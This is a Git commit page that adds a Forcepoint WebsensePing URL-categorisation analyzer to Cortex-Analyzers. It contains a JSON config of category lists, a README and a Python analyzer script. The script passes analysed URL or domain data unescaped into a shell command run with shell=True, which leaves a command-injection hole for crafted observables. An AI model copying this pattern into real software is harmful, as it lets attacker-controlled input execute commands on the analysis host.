valitydev/Cortex-Analyzers
14
0
Fork 0
mirror of https://github.com/valitydev/Cortex-Analyzers.git synced 2024-11-06 09:05:19 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #836 from TheHive-Project/feature/Forcepoint_WebsensePing

Browse Source 
Add forcepoint websense ping Analyzer
This commit is contained in:
Arcuri Davide 2020-08-10 16:17:21 +02:00 committed by GitHub
commit 296ba5b806
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 231 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

172
analyzers/ForcepointWebsensePing/ForcepointWebsensePing.json Normal file
View File

@ -0,0 +1,172 @@
{
"name":
"ForcepointWebsensePing",
"version":
"1.0",
"author":
"Andrea Garavaglia, Davide Arcuri - LDO-CERT",
"url":
"https://github.com/TheHive-Project/Cortex-Analyzers",
"license":
"AGPL-V3",
"description":
"Use ForcepointWebsensePing to determine which category a certain URL is assigned to.",
"dataTypeList": ["url", "ip", "domain", "fqdn"],
"command":
"ForcepointWebsensePing/forcepointwebsenseping.py",
"baseConfig":
"ForcepointWebsensePing",
"config": {
"service": "lookup"
},
"configurationItems": [{
"name":
"hostname",
"description":
"Forcepoint remote Filtering Service",
"type":
"string",
"multi":
false,
"required":
true
}, {
"name": "timeout",
"description": "WebsensePing timeout-secs",
"type": "number",
"multi": false,
"required": true,
"defaultValue": 10
}, {
"name": "path",
"description": "WebsensePing path",
"type": "string",
"multi": false,
"required": true,
"defaultValue": "/opt/Websense/bin"
}, {
"name":
"malicious_categories",
"description":
"List of Forcepoint categories to be considered as malicious",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Dynamic DNS", "Elevated Exposure", "Emerging Exploits",
"Extended Protection", "Newly Registered Websites",
"Suspicious Content", "Advanced Malware Command and Control",
"Advanced Malware Payloads", "Botnets", "Bot Networks",
"Compromised Websites", "Malicious Web Sites",
"Custom-Encrypted Uploads", "Files Containing Passwords",
"Keyloggers", "Malicious Embedded Link",
"Malicious Embedded Iframe", "Malicious Websites",
"Mobile Malware", "Phishing and Other Frauds",
"Potentially Exploited Documents", "Potentially Unwanted Software",
"Spyware", "Suspicious Embedded Link",
"Elevated Exposure Newly Registered Websites",
"Unauthorized Mobile Marketplaces", "User-Defined"
]
}, {
"name":
"suspicious_categories",
"description":
"List of Forcepoint categories you would consider as suspicious",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Uncategorized", "Parked Domain", "Hacking", "Proxy Avoidance",
"Intolerance", "Abused Drugs", "Adult Content", "Adult Material",
"Advertisements", "Computer Security", "Drugs", "Dynamic Content",
"Illegal or Questionable", "Marijuana", "Militancy and Extremist",
"Network Errors", "Peer-to-Peer File Sharing",
"Personal Network Storage and Backup", "Private IP Addresses",
"Sex", "Tastelesstopics or to improper language", "Violence",
"Web and Email Spam", "Security"
]
}, {
"name":
"safe_categories",
"description":
"List of Forcepoint categories you would consider as safe",
"type":
"string",
"multi":
true,
"required":
true,
"defaultValue": [
"Business and Economy", "Bandwidth", "Education", "Government",
"News and Media", "Productivity", "Religion",
"Society and Lifestyles", "Special Events",
"Information Technology", "Abortion", "Advocacy Groups",
"Entertainment", "Facebook Apps ", "Facebook Chat",
"Facebook Commenting", "Facebook Events", "Facebook Friends",
"Facebook Games", "Facebook Groups", "Facebook Mail",
"Facebook Photo Upload", "Facebook Posting", "Facebook Questions",
"Facebook Video Upload", "File Download Servers",
"LinkedIn Connections", "LinkedIn Jobs", "LinkedIn Mail",
"LinkedIn Updates", "Twitter Follow", "Twitter Mail",
"Twitter Posting", "YouTube Commenting", "YouTube Sharing",
"YouTube Video Upload", "Alternative Journals",
"Application and Software Download", "Blog Commenting",
"Blog Posting", "Blogs and Personal Sites", "Classified Posting",
"Social and Affiliation Organizations", "Social Networking",
"Social Organizations", "Social Web - Facebook",
"Social Web - LinkedIn", "Social Web - Twitter",
"Social Web - YouTube", "Social Web Controls - Various", "Sports",
"Entertainment Video", "Financial Data and Services",
"Instant Messaging", "Job Search", "Shopping", "Travel",
"Vehicles", "Search Engines and Portals", "Alcohol and Tobacco",
"Collaboration Office", "Content Delivery Networks",
"Cultural Institutions", "Educational Institutions",
"Educational Materials", "Educational Video", "General Email",
"Health", "Hobbies", "Gay or Lesbian or Bisexual Interest",
"Gambling", "Games", "Hosted Business Applications",
"Internet Auctions", "Internet Communication",
"Internet Radio and TV", "Internet Telephony",
"Media File Download", "Message Boards and Forums",
"Non-Traditional Religion", "Nudity", "Nutrition", "Office - Apps",
"Office - Documents", "Office - Drive", "Office - Mail",
"Office Category used to manage the Office domain",
"Online Brokerage and Trading", "Organizational Email",
"Personals and Dating", "Pay-to-Surf", "Political Organizations",
"Prescribed Medications", "Pro-Choice", "Pro-Life",
"Professional and Worker Organizations", "Real Estate",
"Reference Materials", "Restaurants and Dining",
"Service and Philanthropic Organizations", "Sex Education",
"Lingerie and Swimsuit", "Sport Hunting and Gun Clubs",
"Streaming Media", "Surveillance", "Text and Media Messaging",
"Traditional Religions", "Viral Video", "Weapons", "Web Analytics",
"Web and Email Marketing", "Web Chat", "Web Collaboration",
"Web Hosting", "Web Images", "Web Infrastructure",
"Website Translation"
]
}],
"registration_required":
true,
"subscription_required":
true,
"free_subscription":
false,
"service_homepage":
"https://www.forcepoint.com",
"service_logo": {
"path": "assets/forcepoint_logo.png",
"caption": "logo"
},
"screenshots": [{
"path": "assets/ForcepointWebsensePing_long.png",
"caption": "ForcepointWebsensePing long report sample"
}, {
"path": "assets/ForcepointWebsensePing_short.png",
"caption:": "ForcepointWebsensePing mini report sample"
}]
}

8
analyzers/ForcepointWebsensePing/README.md Normal file
View File

@ -0,0 +1,8 @@
Categorize domain names, URL, fqdn, IP addresses using the popular [Forcepoint Master Database](https://www.forcepoint.com/it/product/feature/master-database-url-categories) service .
#### Requirements
You need a [valid Forcepoint license](https://support.forcepoint.com/KBArticle?id=000016428#WebsensePing/) to use the analyzer:
- Install WebsensePing on instance where you will run this analyzer
- Provide hostname of remote Filtering Service as a value for the `hostname` parameter and timeout as a value for the `timeout` parameter.

BIN
analyzers/ForcepointWebsensePing/assets/ForcepointWebsensePing_long.PNG Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 18 KiB

BIN
analyzers/ForcepointWebsensePing/assets/ForcepointWebsensePing_short.PNG Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
analyzers/ForcepointWebsensePing/assets/forcepoin_logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.3 KiB

47
analyzers/ForcepointWebsensePing/forcepointwebsenseping.py Normal file
View File

@ -0,0 +1,47 @@
#!/usr/bin/env python3
# encoding: utf-8
import subprocess
from cortexutils.analyzer import Analyzer
class WebsensePingAnalyzer(Analyzer):
def __init__(self):
Analyzer.__init__(self)
self.hostname = self.get_param('config.hostname', None)
self.timeout = self.get_param('config.timeout', None)
self.path = self.get_param('config.path', None)
def summary(self, raw):
taxonomies = []
if raw.get('Categories', None):
value = raw['Categories']
if value in self.get_param('config.malicious_categories', []):
level = "malicious"
elif value in self.get_param('config.suspicious_categories', []):
level = "suspicious"
elif value in self.get_param('config.safe_categories', []):
level = "safe"
else:
level = "info"
taxonomies.append(self.build_taxonomy(level, "Forcepoint", "WebsensePing", value))
return {"taxonomies": taxonomies}
def run(self):
Analyzer.run(self)
if self.data_type in ("url", "ip", "domain","fqdn"):
data = self.get_param('data', None, 'Data is missing')
command = "export LD_LIBRARY_PATH={} && {}/WebsensePing -m 25 -url {} -s {} -t {}".format(self.path, self.path, data, self.hostname, self.timeout)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = [line.decode('utf8') for line in process.stdout]
report = {k.strip():v.strip() for k,v in [x.split("=") for x in output if x.find("=") != -1]}
self.report(report)
else:
self.error('Invalid data type')
if __name__ == '__main__':
WebsensePingAnalyzer().run()

1
analyzers/ForcepointWebsensePing/requirements.txt Normal file
View File

@ -0,0 +1 @@
cortexutils

3
thehive-templates/ForcepointWebsensePing_1_0/short.html Normal file
View File

@ -0,0 +1,3 @@
<span class="label" ng-repeat="t in content.taxonomies" ng-class="{'info': 'label-info', 'safe': 'label-success', 'suspicious': 'label-warning', 'malicious':'label-danger'}[t.level]">
{{t.namespace}}:{{t.predicate}}="{{t.value}}"
</span>